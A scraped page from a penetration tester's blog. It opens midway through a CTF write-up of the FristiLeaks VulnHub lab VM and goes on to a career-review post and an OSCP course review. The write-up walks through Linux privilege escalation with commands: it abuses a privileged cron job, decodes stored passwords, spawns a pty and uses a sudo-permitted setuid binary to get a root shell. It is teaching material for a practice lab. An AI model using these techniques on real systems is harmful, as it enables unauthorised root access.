Now you have a low privileged shell as user APACHE. PRIVILEGE ESCALATION As expected of a PHP reverse shell, the display is bad. It will repeat the characters, so the commands in screenshots from this point onwards may not be as accurate as it should be, but I will write the same command in the write-up, so don’t worry about it yeah. Now, let us perform privilege escalation. I will not write too much about the methodology and concepts of privilege escalation in this post, as I will be digressing too much. Let us go straight into finding the interesting information on this machine! The first thing you need to know is the environment that you are in. Run your favourite enumeration scripts, or you can do it manually based on this guide
written by g0tmi1k . It has been super useful during my journey towards obtaining OSCP certification .
KERNEL INFORMATION: Linux version 2.6.32-573.8.1.el6.x86_64 (mockbuild@c6b8.bsys.dev.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-16) (GCC) ) #1 SMP Tue Nov 10 18:01:38 UTC 2015 SPECIFIC RELEASE INFORMATION: CentOS release 6.7 (Final) INTERESTING SYSTEM USERS: root:x:0:0:root:/root:/bin/bash eezeepz:x:500:500::/home/eezeepz:/bin/bash admin:x:501:501::/home/admin:/bin/bash fristigod:x:502:502::/var/fristigod:/bin/bash fristi:x:503:100
PERMISSIONS IN /HOME DIRECTORY: drwxr-xr-x. 5 root root 4.0K Nov 19 2015 . dr-xr-xr-x. 22 root root 4.0K Dec 16 17:13 .. drwx------. 2 admin admin 4.0K Nov 19 2015 admin drwx---r-x. 5 eezeepz eezeepz 12K Nov 18 2015 eezeepz drwx------ 2 fristigod fristigod 4.0K Nov 19 2015 fristigod NETWORK INFORMATION Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN - tcp 0 0 192.168.117.135:41116 192.168.117.134:8888 ESTABLISHED 3001/sh tcp 0 0 :::80 :::* LISTEN - tcp 0 0 ::ffff:192.168.117.135:80 ::ffff:192.168.117.13:43296 ESTABLISHED - SOFTWARE VERSIONS
Sudo version:
Sudo version 1.8.6p3 MYSQL VERSION:
mysql Ver 14.14 Distrib 5.1.73, for redhat-linux-gnu (x86_64) using readline 5.1 APACHE VERSION:
Server version: Apache/2.2.15 (Unix) Server built: Aug 24 2015 17:52:49 In the above information, in your opinion, which is the most interesting ones?
For me, I would like to check the user directory: cd /home
ls *
Notice anything interesting in the output? .
.
.
Yes, you are probably right — let’s check out the text file at /HOME/EEZEEPZ/NOTES.TXT cat /home/eezeepz/notes.txt Yo EZ,
I made it possible for you to do some automated checks, but I did only allow you access to /usr/bin/* system binaries. I did however copy a few extra often needed commands to my homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those from /home/admin/
Don't forget to specify the full path for each binary! Just put a file called "runthis" in /tmp/, each line one command. The output goes to the file "cronresult" in /tmp/. It should run every minute with my account privileges. - Jerry
Nice. Now we know that Jerry has put some of the useful binary files in his directory at /HOME/ADMIN, and we can execute those binaries under his (ROOT) privilege by creating a file called “RUNTHIS” in the /TMP/ directory. Let’s try if we can spawn a reverse shell with root privilege using this cron job!
Set up a listener just like before and create the “runthis” file. _It did not work._
Every minute, the cron job will execute the commands in RUNTHIS and update the CRONRESULTS file located within /TMP/ directory. The current results are the following: command did not start with /home/admin or /usr/bin As such, it is not possible to directly spawn a reverse shell like that. We need to do it using another method. Just to test it out, let’s try running the following command to verify that the cronjob is working fine: /home/admin/chmod 777 /home/admin So apparently, _it works_!
total 20
drwxrwxrwx. 2 admin admin 4096 Nov 19 2015 admin drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 2015 eezeepz drwx------ 2 fristigod fristigod 4096 Nov 19 2015 fristigod Awesome! Now we can read the content in the /HOME/ADMIN directory. bash-4.1$ ls -l
total 632
-rwxr-xr-x 1 admin admin 45224 Nov 18 2015 cat -rwxr-xr-x 1 admin admin 48712 Nov 18 2015 chmod -rw-r--r-- 1 admin admin 737 Nov 18 2015 cronjob.py -rw-r--r-- 1 admin admin 21 Nov 18 2015 cryptedpass.txt -rw-r--r-- 1 admin admin 258 Nov 18 2015 cryptpass.py -rwxr-xr-x 1 admin admin 90544 Nov 18 2015 df -rwxr-xr-x 1 admin admin 24136 Nov 18 2015 echo -rwxr-xr-x 1 admin admin 163600 Nov 18 2015 egrep -rwxr-xr-x 1 admin admin 163600 Nov 18 2015 grep -rwxr-xr-x 1 admin admin 85304 Nov 18 2015 ps -rw-r--r-- 1 fristigod fristigod 25 Nov 19 2015 whoisyourgodnow.txt Here are some interesting files that can be identified in the /HOME/ADMIN directory: * cryptpass.py
* cryptedpass.txt
* whoisyourgodnow.txt First, the content of CRYPTPASS.PY: bash-4.1$ cat cryptpass.py #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn import base64,codecs,sys def encodeString(str): base64string= base64.b64encode(str) return codecs.encode(base64string, 'rot13') cryptoResult=encodeString(sys.argv) print cryptoResult
Next, the content of CRYPTEDPASS.TXT: bash-4.1$ cat cryptedpass.txt mVGZ3O3omkJLmy2pcuTq Lastly, the content of WHOISYOURGODNOW.TXT: bash-4.1$ cat whoisyourgodnow.txt =RFn0AKnlMHMPIzpyuTI0ITG It is not difficult to guess that the python script was used to produce the content in CRYPTEDPASS.TXT and most likely also the WHOISYOURGODNOW.TXT. Based on the source code of CRYPTPASS.PY, I wrote a decode function to do the reverse of CRYPTPASS.PY, let’s call it DECRYPTPASS.PY and here’s the full source code: https://gist.github.com/kongwenbin/8551e2665f6be6e7083a182efbb7f10e By the way, I wrote the script locally before transferring it over using WGET. Please feel free to write it directly on the machine to your liking!
After executing the commands, you will get 2 sets of passwords for each of the “encrypted” text from before. * mVGZ3O3omkJLmy2pcuTq becomes thisisalsopw123 * =RFn0AKnlMHMPIzpyuTI0ITG becomes LetThereBeFristi! I am very sure that LETTHEREBEFRISTI! is the password for user “FRISTIGOD”.
Let’s continue our privilege escalation, this time to “FRISTIGOD” since it is the only folder within the /HOME directory that we do not currently have any access to until now. Something inside there might give us ROOT access. Run the following command to switch user to fristigod: su - fristigod
standard in must be a tty This happens because this is not a full shell. To resolve this issue, simply spawn a tty yourself (straightforward enough). python -c 'import pty;pty.spawn("/bin/bashu - fristigod Password: LetThereBeFristi! id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod) Nice, we are now user “fristigod”! Once again, check our home directory: pwd
/var/fristigod
ls -la
total 16
drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 . drwxr-xr-x. 19 root root 4096 Nov 19 2015 .. -rw------- 1 fristigod fristigod 864 Nov 25 2015 .bash_history drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 .secret_admin_stuff Noticed something interesting? There is a directory named .SECRET_ADMIN_STUFF cd .secret_admin_stuff ls -la
total 16
drwxrwxr-x. 2 fristigod fristigod 4096 Nov 25 2015 . drwxr-x--- 3 fristigod fristigod 4096 Nov 25 2015 .. -rwsr-sr-x 1 root root 7529 Nov 25 2015 doCom ./doCom
Nice try, but wrong user ;) As kindly hinted by the error message, I might be using the binary file in a wrong way. Let’s try to find out more about the usage of this doCom, as this is most likely the gateway to make us root. It can already run programs as root (see its permissions!). Reviewing the /VAR/FRISTIGOD/.BASH_HISTORY file to find clues on how to use the doCom file. cat .bash_history
ls
pwd
ls -lah
cd .secret_admin_stuff/ ls
./doCom
./doCom test
sudo ls
exit
cd .secret_admin_stuff/ ls
./doCom
sudo -u fristi ./doCom ls / sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls / exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls / sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom sudo /var/fristigod/.secret_admin_stuff/doCom exit
sudo /var/fristigod/.secret_admin_stuff/doCom sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom groups
ls -lah
usermod -G fristigod fristi exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom less /var/log/secure e Fexit
exit
exit
Did you notice that the “fristigod” user is always running the following sudo command? sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom Seems like we have to run that same command as well, before we can attempt to execute any other commands. To verify this, simply run the following command: sudo -l
User fristigod may run the following commands on this host: (fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom Looks like we are right. Let’s try it out:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom id uid=0(root) gid=100(users) groups=100(users),502(fristigod) Wow, that was amazing. So, what else can I run? If I can run the ID command like above, can I directly spawn myself a SHELL?
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash uid=0(root) gid=100(users) groups=100(users),502(fristigod) Perfect! Now we can go to the /ROOT directory to check out the flag cd /root
ls -la
-rw-------. 1 root root 246 Nov 17 2015 fristileaks_secrets.txt Ain’t you excited? cat fristileaks_secrets.txt Congratulations on beating FristiLeaks 1.0 by Ar0xA I wonder if you beat it in the maximum 4 hours it's supposed to take! Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode) Flag: Y0u_kn0w_y0u_l0ve_fr1st1 That’s it! Congratulations, you have completed the FristiLeaks v1.3 VulnHub VM!
Thanks for following my write-up, I hope that it has been useful to you and helped you learn something new — be it the thought process or the approach towards hacking a box like this. Also, I would say that this a very good practice machine for folks who intended to take up the OSCP certification .
If you are still on the verge of deciding, check out my OSCP/PWK course review
,
it might be helpful to you. Lastly, thanks Ar0xA for creating this VM, it was fun! Also thanks VulnHub for providing a platform for people to create and upload such CTF alike practice VMs for the community. If you like this write-up, do also check out my other write-ups on the Kioptrix series
as well.
* Write-up for Kioptrix: Level 1 (#1) * Write-up for Kioptrix: Level 1.1 (#2) * Write-up for Kioptrix: Level 1.2 (#3) * Write-up for Kioptrix: Level 1.3 (#4) * Write-up for Kioptrix: 2014 (#5) SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window) *
2 Comments
A REVIEW OF MY PAST ONE-YEAR IN INFORMATION SECURITY November 5, 2017November 10, 2017 Wen Bin KONG
General , Reviews
A review of my past one-year in Information Security Last week, I had my one-year anniversary in the Information Security industry, doing work related to the offensive aspect of security. Surprisingly, it has already been a year since I left my previous role from a local bank and pursued my interest in Information Security. Time really flies… The purpose of this blog is to document my learning journey, but I have neglected it for a few months due to hectic workload from various sources, however, the good news is that I have decided to consciously remind myself to update it more often moving forward! Well, make it a “new year resolution”! Now, back to the review… WORK
Being part of an awesome team at Vantage Point Security , I have been given the opportunity to perform technical security assessment on various organisations in Singapore as a qualified Security Consultant. I was privileged to perform manual security penetration testing on various types of web and mobile applications that belongs to renowned organisations, such as some of the best financial institutions and telecommunication companies in the region. Something interesting is that I am usually a customer of my clients, which makes me really appreciate it when I see them taking security seriously and strive to improve for the better. Overall, I find it very meaningful to be part of this ecosystem in making products better and safer for people – it makes me appreciate the things I am doing and keep me going!
A special shout-out to my mentor, Paul Craig , Sven Schleier
, Jin Kun
and Ryan Teoh
for making my past one-year such an awesome journey of learning! I have learnt so much from them. It is always great to be able to work alongside people who are motivated and passionate about security. I am looking forward to doing even greater stuff together in the year ahead! Always ready to give a high-five to fellow security enthusiasts! CERTIFICATIONS
I have managed to achieve the very first milestone of most penetration testers, Offensive Security Certified Professional (OSCP) ,
after having completed 3-months of intensive lab hands-on practices in its recommended course, Penetration Testing with Kali (PWK) .
I have also written a blog post about my experience gained during the 3-months period, in hope that it will be helpful to fellow like-minded aspiring security enthusiasts. If you are interested, please check out My OSCP / PWK Course Review .
Besides OSCP, I have also gotten myself the following certifications in the past one-year: * CREST Practitioner Security Analyst (CPSA) * CREST Registered Penetration Tester (CRT Pen) * EC-Council Certified Ethical Hacker v9 (CEH) > “CREST is a not for profit organisation that serves the needs of a > technical information security marketplace that requires the > services of a regulated professional services industry.” ~ > directly quoted from CREST >
From my observations, I see that CREST has been very successful in becoming the go-to quality assurance organisations in Singapore when it comes to selecting vendors to work with, be it the government agencies, financial institutions or organisations from other industries. Something I like about them is that they are conducting proctored examinations, which can solve a lot of “problems” caused by people with no ethics value. It is a huge problem occurring around the world, which I am not going to cover in this post – maybe next time (I got to stay on track!). To me, certification is one of the many forms of (technical) quality assurance that a consultant can provide to their clients before engaging them on any security assessment projects. While being certified is a good thing, quality is always better than quantity. It is essential to put the skills you learnt into practice, or it will be just another piece of paper. If you don’t put your skills into practice, it will just be another piece of paper
BUG HUNTING
My experiences in bug hunting have been some of the most devastating yet delightful moment of my past one-year. When I learnt about the existence of “Bug Bounty Program” (e.g. Bugcrowd and HackerOne
), I was both surprised and excited, thinking how it could be fun to be able to find bugs on the internet and get rewarded for it. It sounded really enticing at first, especially with the thoughts that since I have been testing web and mobile applications to earn a living, it should be easy for me. However, it doesn’t take long for me to realise how naive I was to even think that way – we are talking about the internet, man! Any low hanging fruits would have already been discovered by someone else, there is nothing left lying around for me to “hunt”. Well, I thought it would be easy, but… On a positive note, this simple realisation has motivated me to keep up my pace in learning all kinds of “new stuff” that are happening in the internet, such as to research on the security mechanisms and implementation of various popular web applications, development frameworks, content management systems, penetration testing techniques such as bypassing a Web Application Firewall (WAF) etc. and many more interesting stuffs.
Nowadays, I still do bug hunting whenever I get some free time before I turn in for the night, or during some random weekends. Did you noticed that I call it “Bug Hunting” instead of “Bug Bounty”? That is because I don’t only focus on programs that give monetary rewards to security researchers. I work on any programs that I find it meaningful and reasonable to test, such as companies that I personally use their products or companies that give a clearly defined scope on their Responsible Disclosure or Bug Bounty
Programs.
Just playing my part in making the world a better place While it may sound cheesy to say that I want to make the world and the internet a safer place for everyone, sometimes people just want to do things that they themselves feel is meaningful, worthwhile, and can make themselves feel good. Personally, to find bugs, disclose them responsibly to the vendor and getting them fixed, is something that makes me feel that way. I am still learning and trying to get better every day. I urge all aspiring bug hunters to create a Twitter account and start following fellow bug hunters and learn from one another. As mentioned earlier, I will start posting more write-ups in my next one-year, so stay tuned! Besides reading the write-ups from fellow bug hunters, I also recommend reading the publicly disclosed bugs from sources such as the HackerOne Hacktivity
or other unofficial sources such as this and this . One of the best bug bounty tips that I have come across so far is to keep trying, keep learning, and never give up.
Keep learning, and never give up. I have had my fair share of achievement over the past one-year and I feel really honored to be recognized by the 10 following organisations and have myself enlisted on their Security Researcher Hall of Fame: * Netflix
* Nokia
* Adobe
* Sophos
* CERT-EU
* Bitdefender
* Jet.com
* Schuberg Philis
* Silent Circle
* Constant Contact
While I cannot disclose the details of the vulnerabilities that I have discovered, I might write a blog post next time on some of them – with all information masked, of course. Official recognition from Netflix SECURITY RESEARCH
> Life is full of challenges, it is how you responded to them that > makes a difference to your life ~ Source >
We security folks always challenge ourselves in many things – some people challenge themselves to earn 50k in slightly over 1 month ,
some people challenge themselves to earn 30k in 30 days –
we all like to set milestones and work towards it. For me, I am not at their level yet, but one-year ago, I told myself that I want to find a zero-day too. It
seems impossible at first, but I was inspired by one of my colleague, Bernhard Mueller , during one of the project engagement that we did together and made me felt that I can do it too. The influence is real. I would download the same software or application development framework and look for zero-days; this is something that I will not do in the past. He have also written and article about why you should be looking for zero-day vulnerabilities during penetration testing .
As time goes by, it has become a habit for me to look for zero-days during penetration testing engagement as well. Recognition from TIBCO for CVE-2017-5528 Of course, it is easier said than done. Most of these commercial and/or open source software were already being thoroughly tested prior to their releases, so it is very difficult to find any legitimate bugs in them. I have gone through my fair share of hardships, gained tons of knowledge along the way as I constantly failed and was ultimately lucky to have found a few zero-day vulnerabilities on some commercial products used by large enterprises. * CVE-2017-5528
–
TIBCO – JasperReports Server cross-site vulnerabilities It is worth mentioning that TIBCO is an organisation that values security. They take security report seriously and replies promptly to security researchers. It was great communicating with them. * CVE-2017-8042 – Pivotal – Stored Cross-site scripting (XSS) vulnerability in Spring Batch Admin before 1.3.0 * CVE-2017-8043 – Pivotal – Cross-site request forgery (CSRF) vulnerability in the Spring Batch Admin before 1.3.0 Both of the above issues were reported in March 2017 and has been confirmed by Pivotal that they will not be addressing them as the software is going to reach End-Of-Life (EOL) by the end of 2017. The recommendation is for users to migrate to another product, Data Flow. They have recently put up a notice too.
Currently, both CVE trackers are pending Pivotal to publish them online, they have not confirmed a date yet. While they were not high-severity vulnerabilities that could lead to Remote Code Execution (RCE), they were good enough of a start for me. They were genuine bugs on the software, undiscovered and hence left exploitable by malicious attackers, and my research/report did helped the software company to improve their products, which are used by many enterprises all over the world. Good enough, but try harder next time, don’t be contented. It’s only a start.
Next up is an interesting bug that I found while working on one of the private BB program. They are using the PRTG Network Monitor , which is an application that help organisations to monitor their systems, devices, traffic and applications that are using common technologies like SNMP, WMI, SSH, and many more. I shall restrain from providing too much information for now, maybe a write-up after the latest version and release notes has been officially released. * CVE-2017-????? – Paessler AG – pending security patch and release notes
Photo of myself at the Cybersecurity Camp @ Singapore 2017 – Source Lastly, I attended the Cybersecurity Camp @ Singapore 2017 which was organised by the Singapore Cybersecurity Consortium (SGCSC) earlier this year and learnt about fuzz testing for finding vulnerabilities. Having equipped with this knowledge and its theoretical understanding for a few months, I finally put them into practice after being encouraged by Jin Kun as he shared his own success story of having discovered many zero-day vulnerabilities through fuzzing. Being inspired and motivated to do my own fuzzing as well, I learnt many things along the way, specific to how to fuzz an application efficiently, how to fuzz an application library, how to optimize my virtual machines processes for better performances, how to fine-tune my fuzzer, how does different fuzzers mutate or identify different paths within an application flow, how to compile binaries using different compilers and buildsystem, how to analyse a crash, and many more interesting stuff that I never thought I would learn. After some time of fuzzing, I have discovered 3 CVEs on BinChunker, the issues has been fixed and changes are being pushed to various Linux distros as I am writing this blog post. * CVE-2017-15953
–
BinChunker – Heap-based buffer overflow * CVE-2017-15954
–
BinChunker – Heap-based buffer overflow * CVE-2017-15955
–
BinChunker – Memory Access Violation There will be a short write-up on this soon. While BinChunker
is not a very popular tool based on Debian popularity contest statistics and
there was no RCE exploit developed for the discovered vulnerabilities, it was very satisfying. I really enjoyed the experience from discovering these vulnerabilities to reporting them and eventually getting them fixed. It’s great to see how people react and appreciate the findings you discovered and then work together to fix the problem as a team. Information Security is a super awesome community where people help one another to make things better! COMMUNITY PROJECTS
Have you checked out the OWASP Mobile Security Testing Guide (MSTG) already? If you have not, then you probably should
.
The MSTG is a comprehensive manual for mobile application security testing and reverse engineering. It describes the technical processes for verifying the controls listed in the OWASP Mobile Application Verification Standard (MASVS) . You can also read it on Gitbook or
download it as an e-book .
Main Deliverables of the OWASP Mobile Security Testing Guide I was fortunate to work alongside the project leaders of MSTG at work and since I know nothing about mobile application security testing back then, I was highly encouraged by Bernhard to use the MSTG as my “study material” and if I find anything missing, I can research on them separately and contribute to this community project by submitting a Pull request. Well, it makes sense – since I am going to research on those things to learn anyway, why not share the knowledge with the community and help fellow aspiring security enthusiast in their learning as well?
With consistent contribution of quality content for a few months, I am humbled to be acknowledged as one of the “Top Contributor ” for the
OWASP MSTG project. If you are someone whom is interested in mobile application security, I highly encourage you to read through the content and create a pull request if you find anything missing. Once you start submitting those pull requests, they can become quite addictive.
ACADEMIC
This is the last section of the review. Some of my friends know that I am currently a part-time student enrolled in Master of Computing (Infocomm Security)
at National University of Singapore (NUS). My first semester was hectic, having not been studying academic syllabus since graduated in 2014, however, things went well thanks to the support of family and friends (special shout-out to Zhan Teng, Julian Tan and Jiqing for being super awesome teammates!). The second semester is coming to an end soon and of course, with tons of submission deadlines to meet in the next few weeks and a few exams to clear! Android Booting Process Other things worth mentioning are some of the more interesting homework that I did this semester for one of my module, CS5231 – System Security, taught by Professor Liang Zhenkai. Usually when I root an android device, I use readily available tools and does not have a clear understanding about what really happened under the belly. In order to complete one of the tasks in the homework, I was being forced to step out of my comfort zone and dive into how android really works, how the rooting of android is being performed, what are the various methods to root an android device and eventually also created my own custom Over-The-Air (OTA) package to perform code execution as root; to fire up my own daemon service that can help to spawn a root shell to my client upon request. CONCLUSION / TO-DO FOR THE NEXT YEAR Without knowing, this blog post has turned out to be a long article. Personally, I find it worthwhile and meaningful to just sit down, think-through and review about what I have done in my past one-year in the industry of Information Security. I feel that everyone should do something similar and then think about what they want to do in the next one-year.
Think about some of the things that you want to achieve in the next one-year
The reason for me to post this article is also to put some pressure on myself and make sure that I achieve the goals which I said that I want to achieve in the next one-year. Next year, I am going to look back at this article and question myself. In the next one-year, I intend to work on other CREST certifications, such as the CREST Certified Infrastructure Tester (CCT INF) and/or CREST Certified Web Applications Tester (CCT APP) .
Like I mentioned above as well, I like how they are conducting proctored examinations here in Singapore and I find that they can be great milestones to challenge myself in the next one-year. Another certification which I am looking forward to challenge myself with is the Offensive Security Certified Expert (OSCE) ,
which I intend to sign up for its course, Cracking the Perimeter (CTP) ,
in the next few months. I need to try harder! #TryHarder I got to try harder! In view of the OSCE certification goal, I hope to focus more on low-level stuff, such as to improve my exploitation techniques, exploit development skills, etc., which are things that I don’t have much experience with now, but are useful skills which I am very keen to pick up.
In the next one-year, I hope to continue to hunt for bugs and keep up with the learning. I also aim to post write-ups on any interesting bugs, if I am given the permission to do so. Other things are write-up on CTF labs such as the Bandit from OverTheWire
and
practice machines such as Kioptrix from Vulnhub .
For work, apart from Web Application and Mobile Application penetration testing, I hope that I can have opportunities to gain more exposure across the Asia region and get myself involved in different types of engagements, such as ATM Hacking, Red Teaming and Wireless Hacking. There are so many things to learn, I can’t wait anymore! I need to be more productive… I also aim to develop my own Burp Extender module that can help to improve my productivity. At least my first extender module should not be too complicated, I just need to get started with something, start small, gain the knowledge and momentum before targeting something more complicated. If you have any interesting ideas that are not too complicated, please share in the comments section. Lastly, as part of my Master course requirements, I need to complete a one-semester long research project (3-months duration). I can choose between an academic project proposed by one of the NUS professor, or an industrial project proposed by a company in the industry. I have not chosen any topics yet, but I hope that I can work on something useful to my field of work, to not only clear my course requirements, but also allow me to learn practical techniques and knowledge that are relevant to my area of interest. That way, I will have enough interest to continue to work on it after the 3-months duration. If there is any potential projects related to offensive side of security and not too complicated/simple, I would love to know it. If you have read this entire post, you deserve a medal, just like this camera man
I hope that the next one-year will be even better and full of learning opportunities for me! Till I blog again. SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window) *
Leave a comment
MY OSCP / PWK COURSE REVIEW February 23, 2017November 5, 2017 Wen Bin KONG
General ,
Resources ,
Reviews , Tips
certification
, certs
, exams
, oscp
It have been a tough 3 months of virtual lab and hands-on training – so much learning, and I mean, _intensive learning; _combo with many sleepless nights and so much sweat and tears (maybe not the tears part but you get the point), I have finally passed my OSCP!
I am now officially an Offensive Security Certified Professional! Yes, I tried harder #tryharder It have been a very tough 3 months of journey, which explains why I have not been blogging anything at all since then. I am happy to be back and blogging once again! Okay, here comes my review about the course, specifically for any fellow aspiring ethical hacker like me, or simply anyone who have passion in the topic of computer security and wants to learn the technical side of the skill set. A little bit about myself (for reference to the content below): I graduated from the National University of Singapore (NUS), School of Computing, Bachelor of E-Commerce, in 2014. Since then, I have been working as an IT Infrastructure Project Delivery Manager at a bank. In my role, I basically coordinates the completion of various deliverable for either the upgrading of existing systems or setting up of new systems. _Up to this point, my job were not security related._ To pursue my interest in information security, I left my job. I took up training courses and obtained my EC-Council Certified Ethical Hacker (CEHv9 )
certification during September 2016. Ever since then, I have been doing a lot of self learning on IT security stuff, especially from trying out hands on self-training by hacking the Virtual Machines downloadable from Vulnhub , you can read some of my write-ups over here .
Before you sign up for the OSCP course, it is essential to plan your time well! I made a mistake so I’d like you to learn from it. First, you have to know that to obtain the OSCP certification, you will need to register yourself for the Penetration Testing with Kali (PWK ) course.
The course consists of a virtual lab environment of which the credentials will be sent to you (along with training manual and videos) after you have successfully registered for the course. The mistake which I have made is to directly plan for a nice weekend (and a week with lesser work) to sign up for the course, thinking that I could get started immediately. Listen/read: YOU WILL NOT START THE COURSE IMMEDIATELY. Courses will only start at certain days of each week, and each week can only have a limited number of students to start their PWK course, depending on the sign up rates, which will not be disclosed by Offensive Security. For my case, the earliest I could get started back then was 2 weeks after I have signed up for the course. Noticed the mistake here? I totally expected myself to be able to get started right after I signed up! With the above mistake and poor time management at the start, I spent several days on the PDF lab manual exercises and the training videos. As reference, I started working on the lab machines 2 weeks after my PWK course commenced. Many people would recommend that you jump straight into the lab and not waste any time. I would like to disagree partially. While I believe that you could learn faster jumping into the lab straight, but there are some skill sets which you have to pick up before just jumping in straight. Personally, I find that you should go through the lab manual on the chapter regarding various methods for file transfer. You should not miss the chapter for buffer overflow too, that is very important, as it teaches you how to craft your own simple fuzzer, shell code and modify the exploit. The fundamental enumeration techniques are very important too, specifically the chapter on using tools like nmap. Essentially, my point is — DON’T JUST JUMP INTO THE LAB UNLESS YOU KNOW WHAT YOU ARE DOING. Learn the basics, and then jump in to try out the tools. When things are not right, jump out again. That is the whole point of the lab — for you to practice what you learnt and not just study the theory. Regarding the learning curve, I must say that it really takes time to get your very first shell and it gets really addictive. Personally, it took me quite awhile to get my first shell even though it is just simply running the Metasploit tool. Don’t know about Metasploit? Fret not, it will be covered in the lab manual. Or you can complete the Metasploit Unleashed Free Ethical Hacking Course , like I
did. It was good learning as well and most importantly, it is an Own Time Own Target (OTOT) kind of free online course. Be patient, shell will come, you just need to try harder, don’t give up. Thanks to the advise and encouragement from my mentor (Paul, that’s you), I took up the challenge of hacking PAIN as my 10th machine. For those who don’t know what that means — Pain is one of the “boss” machine in the OSCP lab environment, along with his buddies: Sufferance, Humble and Gh0st. Hacking Pain as my 10th machine was no easy task. But like I said, I tried harder, it took my 8 days to root it. No joke, 8 days. Along the way, I learnt a lot of stuff I never imagined myself learning and also never expected myself to be able to understand. Of course, no spoilers, but really, just keep Googling and you will find it, trust me, and trust my mentor. Also thanks to these 8 days of being stuck on a machine, I kind of got used to the suffering (you know the feeling when you have no shells for a long time) and started to really pick up my pace moving forward. While I am not going to spoon feed anyone with any post-enumeration scripts, I must say that you can always write your own scripts, or make use of available resources, there are several very good scripts around, for you to find out. One advise though, DON’T JUST USE IT BLINDLY. My peers Jin Kun and Ryan Teoh advised me the same when I was using the downloaded scripts happily initially too. There are cases where information are not presented to you directly, or when the operation system are not identical with the scripts target. In those cases, what are you going to do? Are you going to modify your script, do it manually, or give up? We never give up, so we have to understand what the script is doing. If you don’t understand it, don’t use it. Learn. It’s the same as Metasploit exploits — you run it, get shell, yay. Next, you should first, try to understand why that happened and try to get the same result without using Metasploit. The good thing is that in each of the Metasploit modules, you can run the command ‘info’ to read its description and you can read the source code of the modules directly in the “_/usr/share/metasploit-framework/modules_” directory. Like many people would have also shared with you, for privilege escalation, the only reference notes which you may need are probably just these list for Windows and
Linux
respectively.
Learn and understand them and you are good to go. At the end of my lab time, I managed to make my way all the way into the Administrative department (as shown in the image above) and hacked some of the machines in there. During my 3 months of lab time, I managed to root 42 out of machines. It was not that bad, it is possible, you have to believe in yourself. Finally, it’s the exams. For those who are not familiar with the exam format, the hands-on exam duration is 23 hours and 45 minutes. There will be several machines for you to attack and get the “flags”. After your time is up, you will be cut off from the exam’s Virtual Private Network (VPN) and you will have to submit a professionally prepared lab report within the next 24 hours. This document should contain the testing process and step-by-step guides on how to replicate the vulnerability and get shell of the highest system privileges.
I was lucky because there were several components that were very similar to some of the machines which I have rooted previously in the lab. While I cannot specifically share what exactly are the components, I believe I can share that, if you keep working on getting more machines rooted and understand the vulnerabilities that you have exploited to root those machines, trust me — you will recognize it when you see it during the exams. Of course, the exam machines will not be so straight forward, but they will most likely be made up of several vulnerabilities (which you have already seen back then in the lab) being put together, where after exploiting one vulnerability, it leads to the discovery or/and exploitation of the next vulnerability. Again, time management is super important during the exams, you should not get stuck for too long and keep getting stuck in that particular spiral. Move on to the next machine and start enumerating for any attack vectors. Come back again later. Don’t give up. THE ONLY REASON WHY THE MACHINE IS THERE IS BECAUSE IT IS HACKABLE, that is the only fact that you should remember during your exams! To sum up, it was a very fruitful and enriching 3 months of lab time taking the PWK course. Definitely, if time allows, I would love to take up other courses from Offensive Security. A shout out: I am very thankful to my friends at Vantage Point Security, whom never fails to ask me about my progress on the lab machines and listen to my rants and gave me motivational speeches. Special thanks to Paul Craig, Jin Kun and Ryan Teoh, whom constantly gave me constructive advise and encouragement that keeps me going, not forgetting the many ping pong sessions whenever I am having mind blockage. Also thanks my family for supporting me! Lastly, my girlfriend is so awesome, for being so understanding and considerate towards me during my busy 3 months of journey towards getting my OSCP certification. Good luck to anyone who wish to take up the challenge of becoming an Offensive Security Certified Professional (OSCP)! SHARE THIS:
* Click to share on LinkedIn (Opens in new window) * Click to share on Facebook (Opens in new window) * Click to share on Twitter (Opens in new window) * Click to share on WhatsApp (Opens in new window) * Click to share on Telegram (Opens in new window) * Click to share on Pocket (Opens in new window) * Click to share on Reddit (Opens in new window) * Click to share on Tumblr (Opens in new window) * Click to email this to a friend (Opens in new window) *
25 Comments
WRITE-UP FOR KIOPTRIX VIRTUAL MACHINES FROM VULNHUB November 3, 2016December 30, 2017 Wen Bin KONG CTF
, Resources
CTF
, kioptrix
, vm
, vulnhub
, writeup
I have finally completed the writeup of all 5 Kioptrix Virtual Machines
(VMs)
from Vulnhub.com , I hope they are helpful to you.
While they are being categorised as “beginner” level challenges, I find them pretty challenging and definitely an effective training for me. I learnt many things through working on these VMs. For your convenience, the following are the 5 writeups on Kioptrix machines,
